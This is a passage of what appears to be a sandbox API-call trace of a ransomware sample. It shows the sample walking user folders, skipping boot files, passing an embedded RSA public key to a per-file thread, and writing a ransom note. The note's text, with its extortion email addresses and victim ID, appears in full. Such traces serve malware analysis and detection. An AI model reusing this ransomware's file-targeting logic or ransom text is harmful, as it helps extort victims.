f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.338] lstrcpyW (in: lpString1=0x17be7c, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0205.338] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xea4 [0205.338] Sleep (dwMilliseconds=0x96) [0205.488] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0205.488] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="..") returned 1 [0205.488] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2=".") returned 1 [0205.488] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.489] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntldr") returned 0x0 [0205.489] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTLDR") returned 0x0 [0205.489] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.489] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0205.489] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0205.489] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") [0205.489] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.489] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0205.489] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xea8 [0205.489] Sleep (dwMilliseconds=0x96) [0205.644] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0205.644] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="..") returned 1 [0205.644] lstrcmpW (lpString1="Windows Live Mail.url", lpString2=".") returned 1 [0205.645] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.645] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntldr") returned 0x0 [0205.645] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTLDR") returned 0x0 [0205.645] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.645] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntdetect.com") returned 0x0 [0205.645] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0205.645] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") [0205.645] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.645] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0205.645] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xeac [0205.645] Sleep (dwMilliseconds=0x96) [0205.800] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0205.800] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="..") returned 1 [0205.801] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2=".") returned 1 [0205.801] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.801] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntldr") returned 0x0 [0205.801] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTLDR") returned 0x0 [0205.801] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.801] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntdetect.com") returned 0x0 [0205.801] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0205.801] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") [0205.801] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.801] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0205.801] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xeb0 [0205.802] Sleep (dwMilliseconds=0x96) [0205.966] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0205.966] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0205.971] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0205.971] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0205.971] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0205.971] SetErrorMode (uMode=0x1) returned 0x1 [0205.972] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 61 [0205.972] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0205.972] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0205.972] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xeb4) returned 0x0 [0205.972] RegQueryValueExW (in: hKey=0xeb4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bb250, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43bb250*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0205.972] RegCloseKey (hKey=0xeb4) returned 0x0 [0205.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0205.972] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0205.972] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.973] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0205.975] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0205.975] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Windows Live") returned="Windows Live" [0205.975] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0205.976] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0205.976] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0205.976] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0205.976] SetErrorMode (uMode=0x1) returned 0x1 [0205.976] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0205.976] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0205.977] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Links\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0205.977] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*" [0205.977] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0205.977] PathFindFileNameW (pszPath="C:\\Users\\Default\\Links") returned="Links" [0205.977] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0205.977] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.977] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0205.977] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0205.978] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0205.978] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0205.978] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0205.978] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Links\\") [0205.978] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.978] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0205.978] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0205.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xebc [0205.978] Sleep (dwMilliseconds=0x96) [0206.128] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0206.128] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0206.128] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0206.128] StrStrW (lpFirst="Desktop.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.128] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntldr") returned 0x0 [0206.128] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTLDR") returned 0x0 [0206.128] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0206.128] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntdetect.com") returned 0x0 [0206.128] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0206.128] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Links\\") [0206.129] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.129] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0206.129] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec0 [0206.129] Sleep (dwMilliseconds=0x96) [0206.284] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0206.284] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0206.284] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0206.284] StrStrW (lpFirst="Downloads.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.284] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntldr") returned 0x0 [0206.284] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTLDR") returned 0x0 [0206.284] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0206.284] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntdetect.com") returned 0x0 [0206.284] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0206.284] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Links\\") [0206.284] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.284] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0206.284] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x908 [0206.285] Sleep (dwMilliseconds=0x96) [0206.440] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0206.440] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="..") returned 1 [0206.440] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2=".") returned 1 [0206.440] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.440] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntldr") returned 0x0 [0206.440] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTLDR") returned 0x0 [0206.440] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0206.440] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntdetect.com") returned 0x0 [0206.440] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0206.440] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Links\\") [0206.440] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.440] lstrcpyW 